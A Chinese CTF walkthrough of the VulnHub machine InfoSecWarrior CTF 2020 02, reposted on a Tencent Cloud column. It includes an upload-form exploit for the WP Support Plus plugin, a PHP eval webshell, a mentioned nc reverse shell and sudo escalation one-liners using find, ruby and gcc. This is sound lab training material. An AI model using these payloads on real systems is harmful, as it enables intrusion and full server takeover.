专栏首页HACK学习Vulnhut靶机渗透 InfoSecWarrior

Vulnhut靶机渗透 InfoSecWarrior

InfoSecWarrior CTF 2020 2

总体思路

需要原图的话,公众号后台回复数字:0423

信息收集

IP地址

nikto

无有用信息

enum4linux

无有用信息

nmap扫描

发现有80端口和3306端口。

web 浏览

首页为apache的默认页面。

在此页面发了网站目录g@web,访问该目录

在blog栏目找到该网站为wordpress。

wpscan

使用wpscan对网站进行扫描,使用 -e u 枚举用户

wpscan --url 10.0.2.64/g@web -e u

我们发现了用户wp-localt 和一个页面:http://10.0.2.64/g@web/index.php/wp-json/wp/v2/users/?per_page=100&page=1

访问该页面:

在页面中发现:hackNos@9012!!,提示为可以用此密码得到shell

在使用-e ap,查看wordpress的插件

wpscan --url 10.0.2.64/g@web -e ap

发现插件WP Support Plus Responsive Ticket System 和上传目录http://10.0.2.64/g@web/wp-content/uploads/

web shell

利用漏洞:WP Support Plus Responsive Ticket System <= 8.0.7 - Remote Code Execution

<form method="post" enctype="multipart/form-data" action="http://10.0.2.64/g@web/wp-admin/admin-ajax.php">    <input type="hidden" name="action" value="wpsp_upload_attachment">    Choose a file ending with .phtml:    <input type="file" name="0">    <input type="submit" value="Submit"></form>

将代码进行适配并保存到本地,存为html文件,本地启用http服务并加载该文件。

可以看到,是需要上传一个.phtml的文件,我们将一句话木马写入文件

<?php @eval($_POST['cmd']);?>

将木马上传。

在上传文件夹下的wpsp文件夹中找到了上传的木马。

用蚁剑连接

在蚁剑中使用虚拟终端,就获得了webshell

系统shell

反弹shell

在蚁剑中的虚拟终端中,使用nc反弹

本地监听,得到反弹shell

提权

信息收集

数据库信息

'DB_NAME', 'hackNos''DB_USER', 'wp''DB_PASSWORD', 'g@web-password'

系统信息

系统用户

cat /etc/passwd|grep /bin/bash
hunter:x:1000:1000:hunter,,,:/home/hunter:/bin/bashsecurity:x:1001:1001:Security,,,,Audit:/home/security:/bin/bashhackNos-boat:x:1002:1002:crawler,,,,web directory crawler:/home/hackNos-boat:/bin/bash

关键文件

在 /home/hunter/下发现user.txt文件。

提权到security

使用之前的hackNos@9012!!和数据库密码g@web-password尝试登录三个系统账号,最终发现security的密码为hackNos@9012!!

我们已经提权到security

提权到hackNos-boat

使用sudo -l查看特权

发现可以用hackNos-boast账户使用find命令,使用find进行提权 使用gtfo查找提权命令,网址为:https://gtfobins.github.io/

执行命令:

sudo -u hackNos-boat /usr/bin/find . -exec /bin/bash \; -quit

已经提权到hackNos-boast账号

提权到hunter

使用sudo -l查看特权

发现可以用hunter账户使用ruby命令,使用ruby进行提权 使用gtfo查找提权命令。

执行命令:

sudo -u hunter /usr/bin/ruby -e 'exec "/bin/bash"'

提权到hunter账号

user.txt文件

访问前面发现的user.txt文件

得到第一个flag4676cd2e30b6d0b8650d14a5dd9f16c3

提权到root

使用sudo -l查看特权

发现可以用root执行gcc命令,使用gcc提权

用gtfo查找提权命令

sudo /usr/bin/gcc -wrapper /bin/bash,-s .

访问root.txt

bae11ce4f67af91fa58576c1da2aad4b

原创投稿作者:Crazy

靶机下载地址:https://www.vulnhub.com/entry/infosecwarrior-ctf-2020-02,447/

本文分享自微信公众号 - HACK学习呀(Hacker1961X),作者:Crazy​

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-04-23

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 记一次渗透挖洞提权实战

    摘要:这是一次挖掘cms通用漏洞时发现的网站,技术含量虽然不是很高,但是也拿出来和大家分享一下吧,希望能给一部分人带来收获。

    HACK学习
  • 手把手教你如何利用Meterpreter渗透Windows系统

    在这篇文章中,我们将跟大家介绍如何使用Meterpreter来收集目标Windows系统中的信息,获取用户凭证,创建我们自己的账号,启用远程桌面,进行屏幕截图,...

    HACK学习
  • 渗透测试之ASP Web提权

    1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\co...

    HACK学习
  • 面向工作记忆过程的双向额顶振荡系统

    最近,来自加利福利亚大学Helen Wills神经科学研究所的学者通过研究表明在工作记忆过程中,前额叶皮质区与大脑后皮质区之间具有一套完整的平行双向神经振荡系统...

    用户1279583
  • 04丨JMeter和LoadRunner:要知道工具仅仅只是工具

    做性能测试工作的人总是离不了性能测试工具,但当我们刚开始接触这类工具或者压测平台的时候,总是难免处在一种顾此失彼,焦虑又没想法的状态。

    软测小生
  • WordPress固定链接后404解决方法

    一般Wordpress自带的链接是一大串数字加符号,不美观也不明确,一般要设置成固定链接,而设置成功后大部分情况访问文章,子链接都会出现404界面,我找了网上的...

    咕咕星
  • Java Web 中使用ffmpeg实现视频转码、视频截图,javaffmpeg

    http://www.cnblogs.com/dennisit/archive/2013/02/16/2913287.html#!comments

    bear_fish
  • LiSSS (Literary Spanish Sentences Sentiment):用于情感检测的语料库(CS CL)

    在本文中,我们提出了一个新的创新计算(CC)领域小型语料库,名为Literary Spanish Sentences Sentiment (LISSS),通过对...

    Elva
  • 搭建k8s高可用集群 - 二进制方式

    这五台机器均需事先安装好Docker,由于安装过程比较简单这里不进行介绍,可以参考官方文档:

    端碗吹水
  • 基于kubeadm搭建k8s高可用集群

    这五台机器均需事先安装好Docker,由于安装过程比较简单这里不进行介绍,可以参考官方文档:

    端碗吹水

扫码关注云+社区

领取腾讯云代金券